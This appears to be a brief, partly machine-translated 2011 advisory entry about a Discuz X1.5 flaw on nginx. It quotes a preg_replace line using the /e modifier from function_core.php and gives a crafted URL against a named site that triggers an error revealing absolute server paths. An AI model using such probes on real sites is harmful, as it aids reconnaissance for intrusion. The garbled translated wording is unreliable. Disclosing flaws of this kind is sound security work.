Discuz 1.5 with NGINX secondary analytical proof path BUG-vulnerability warning-the black bar safety net

2011-09-01T00:00:00
ID MYHACK58:62201131753
Type myhack58
Reporter 佚名
Modified 2011-09-01T00:00:00

Description

Author: Sunny small cast

Test environment: discuz X1. 5+nginx 1.0 漏洞 文件 source/function/function_core.php that code:

$_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_default', 0, '".$ _G['setting']['domain']['app']['default'].$ port.$ _G['siteroot']."', '\\1')", $content);

Use code:

http://www.badguest.cn/forum.php/admin.php’/DDDDDDD.php

It can be at the bottom to see a burst of absolute paths of error.